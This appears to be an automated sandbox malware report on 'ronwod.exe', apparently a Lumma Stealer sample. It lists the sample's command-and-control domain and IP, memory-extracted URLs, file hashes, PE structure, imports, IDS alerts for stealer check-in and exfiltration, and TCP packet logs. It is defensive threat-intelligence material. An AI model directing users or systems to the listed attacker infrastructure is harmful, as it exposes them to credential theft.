https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/apicQqi	ronwod.exe, 00000000.00000003.1701781398.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/apieH;	ronwod.exe, 00000000.00000003.1701708029.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750093043.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728584108.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750624772.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/apite/I3	ronwod.exe, 00000000.00000003.1875175343.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1775565703.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1798548795.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1802540214.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/apib	ronwod.exe, 00000000.00000003.1775519160.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	ronwod.exe, 00000000.00000003.1701673512.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728215344.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724648396.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701544346.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701416116.0000000004013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	ronwod.exe, 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1802540214.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750624772.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1673073544.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896775903.0000000001032000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896473117.0000000001026000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1775565703.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701708029.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1798548795.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1875175343.0000000001024000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728584108.0000000001024000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	ronwod.exe, 00000000.00000003.1701416116.0000000004015000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click:443/api	ronwod.exe, 00000000.00000003.1816381307.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/s	ronwod.exe, 00000000.00000003.1673073544.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	ronwod.exe, 00000000.00000003.1701544346.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/apino.	ronwod.exe, 00000000.00000003.1816381307.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1803349034.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.92.219	lackadausaz.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581561
Start date and time:	2024-12-28 08:16:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ronwod.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 39 Number of non-executed functions: 128
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.92.219	http://workers-playground-summer-snowflake-c7fc.community-helpdesk.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	workers-playground-summer-snowflake-c7fc.community-helpdesk.workers.dev/
104.21.92.219	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	casaalonsoquijano.com/wp-login.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.166.49
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	48.252.190.9.zip	Get hash	malicious	Unknown	Browse	104.21.95.219
	https://haleborealis.com	Get hash	malicious	Unknown	Browse	104.22.72.81
	External2.4.exe	Get hash	malicious	LummaC	Browse	104.21.29.252
	Aura.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	104.26.13.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.92.219
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	Neverlose.cc-unpadded.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	External2.4.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	Aura.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	Aura.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.92.219

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.953519512977486
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ronwod.exe
File size:	28'672 bytes
MD5:	63ff0c8e75aa669f22e79ebf017c0aa8
SHA1:	1255d7f37e1d2d36632bd142b76d8141c47c45a3
SHA256:	e8ac8d925f9b53bb66892cbac2f38cf7c1bcc5802a79c74c6d8b54e684b66e6a
SHA512:	1756b3b2bc7ceb6e65812472449b6d3986798885efe36eec4f09d84a2c02dd553be54a57d4fcadb9212017ce1e00f6eae27be295aa1544d779acfdf9337e19b3
SSDEEP:	768:iZBrjUZQBuH24LfgzBXGkd+vA4BfBs2wWwid:k1A1H24gzBXlsvWW
TLSH:	E1D22B36F506C0F4D5B0A1737556CB3AC1567E3982BBDA177F5A9A0CB552AC1E80B303
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg...............'.<...l......m4.......P....@.......................................@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40346d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x676DBF0D [Thu Dec 26 20:39:41 2024 UTC]
TLS Callbacks:	0x403c60, 0x403c10
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ec197db05918b643672a5f762a6bf67f

Entrypoint Preview

Instruction
lea ecx, dword ptr [esp+04h]
and esp, FFFFFFF0h
push dword ptr [ecx-04h]
push ebp
mov ebp, esp
push esi
push ebx
push ecx
sub esp, 000000FCh
call 00007F555883485Dh
mov dword ptr [ebp-1Ch], FFFEAD6Ch
mov dword ptr [ebp-20h], 0000044Ah
mov dword ptr [ebp-24h], 0000BB48h
mov dword ptr [ebp-28h], 00006C95h
mov dword ptr [ebp-2Ch], 00009E21h
mov dword ptr [ebp-30h], 00012977h
mov dword ptr [ebp-34h], FFFE882Bh
mov dword ptr [ebp-38h], 00003D3Dh
mov dword ptr [ebp-3Ch], FFFF3111h
mov dword ptr [ebp-40h], 00009E96h
mov dword ptr [ebp-7Fh], 72657645h
mov dword ptr [ebp-7Bh], 69687479h
mov dword ptr [ebp-77h], 7320676Eh
mov dword ptr [ebp-73h], 656C7974h
mov dword ptr [ebp-70h], 006F2065h
mov dword ptr [ebp-000000BAh], 6966664Fh
mov dword ptr [ebp-000000B6h], 73206563h
mov dword ptr [ebp-000000B2h], 6C756F68h
mov dword ptr [ebp-000000AEh], 6F432064h
mov dword ptr [ebp-000000AAh], 6572676Eh
mov dword ptr [ebp-000000A6h], 6D207373h
mov dword ptr [ebp-000000A2h], 0000736Fh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9000	0x870	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x4e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd000	0x298	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x61ac	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x91a4	0x118	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3bc4	0x3c00	d43dbcd582b2de6b24c9b54f13ec3b69	False	0.6252604166666667	data	6.308095947249623	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x5000	0x2c	0x200	8af2200f3d78bfef912a7a5e90b3b6d9	False	0.0703125	data	0.45553213366209966	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x6000	0x8e8	0xa00	fae3ccf05cc435c192297337e2b36558	False	0.305078125	data	5.178055096636522	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x7000	0xb74	0xc00	e12be465000291135c76033ef2bee1bb	False	0.4000651041666667	data	4.627729876750088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x8000	0xc0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x9000	0x870	0xa00	255702de46ede0f2abe227c7565d9168	False	0.3953125	PGP symmetric key encrypted data - Plaintext or unencrypted data	4.369429268872872	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0xa000	0x30	0x200	b861caf0a71ba67826f7f5151137e51b	False	0.064453125	data	0.2155331448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xb000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc000	0x4e8	0x600	302acf3589069dafe3806c6220e3778b	False	0.333984375	data	4.778477168376261	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xd000	0x298	0x400	7d7eb6029df6b012857b1dac513c3922	False	0.62109375	data	4.8724675758400435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc058	0x48f	XML 1.0 document, ASCII text			0.40102827763496146

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, InitializeCriticalSection, LeaveCriticalSection, LoadLibraryA, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
msvcrt.dll	__getmainargs, __initenv, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _initterm, _iob, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, strlen, strncmp, vfprintf
ncrypt.dll	BCryptDuplicateHash, BCryptGenRandom, BCryptGenerateKeyPair, BCryptRemoveContextFunction, NCryptCreatePersistedKey, NCryptEnumStorageProviders, NCryptIsKeyHandle, NCryptSetProperty
winmm.dll	midiInGetErrorTextA, midiOutGetDevCapsA, mixerGetLineInfoA, mixerSetControlDetails, mmGetCurrentTask, mmioSetInfo, waveInOpen, waveInStart
wsdapi.dll	WSDCreateOutboundAttachment, WSDDetachLinkedMemory, WSDGenerateFault, WSDGenerateFaultEx, WSDGetConfigurationOption, WSDUriDecode, WSDXMLCreateContext, WSDXMLGetNameFromBuiltinNamespace
cr.dll	EMuqdKRvBcgQuKOr

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T08:17:35.808666+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.92.219	443	TCP
2024-12-28T08:17:36.568903+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.92.219	443	TCP
2024-12-28T08:17:36.568903+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.92.219	443	TCP
2024-12-28T08:17:37.915665+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.92.219	443	TCP
2024-12-28T08:17:38.703199+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.92.219	443	TCP
2024-12-28T08:17:38.703199+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.92.219	443	TCP
2024-12-28T08:17:40.769739+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.92.219	443	TCP
2024-12-28T08:17:43.452697+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.92.219	443	TCP
2024-12-28T08:17:45.788644+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.92.219	443	TCP
2024-12-28T08:17:48.507871+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.92.219	443	TCP
2024-12-28T08:17:49.171305+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49735	104.21.92.219	443	TCP
2024-12-28T08:17:50.929223+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.92.219	443	TCP
2024-12-28T08:17:58.112903+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.92.219	443	TCP
2024-12-28T08:17:58.967526+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49741	104.21.92.219	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 08:17:34.542179108 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:34.542215109 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:34.542287111 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:34.545125008 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:34.545135975 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:35.808551073 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:35.808665991 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:35.815397978 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:35.815404892 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:35.815609932 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:35.861793041 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:35.909996033 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:35.910023928 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:35.910084009 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:36.568932056 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:36.569016933 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:36.569072008 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:36.623204947 CET	49730	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:36.623218060 CET	443	49730	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:36.657609940 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:36.657646894 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:36.657723904 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:36.658020020 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:36.658030033 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:37.915600061 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:37.915664911 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:37.917272091 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:37.917294979 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:37.917499065 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:37.918718100 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:37.918751001 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:37.918781042 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703195095 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703243971 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703273058 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703300953 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703329086 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.703352928 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703365088 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.703392982 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703423023 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703437090 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.703444958 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.703483105 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.711431026 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.720561028 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.720608950 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.720619917 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.768050909 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.768065929 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.814939022 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.822645903 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.861852884 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.903934002 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.907785892 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.907870054 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.907888889 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.907924891 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.908082962 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.908104897 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:38.908114910 CET	49731	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:38.908121109 CET	443	49731	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:39.509013891 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:39.509114981 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:39.509200096 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:39.509605885 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:39.509646893 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:40.769534111 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:40.769738913 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:40.771213055 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:40.771240950 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:40.771472931 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:40.772815943 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:40.772996902 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:40.773041964 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:40.773101091 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:40.773116112 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:41.786520958 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:41.786628962 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:41.786699057 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:41.793591022 CET	49732	443	192.168.2.4	104.21.92.219
Dec 28, 2024 08:17:41.793644905 CET	443	49732	104.21.92.219	192.168.2.4
Dec 28, 2024 08:17:42.238089085 CET	49733	443	192.168.2.4	104.21.92.219
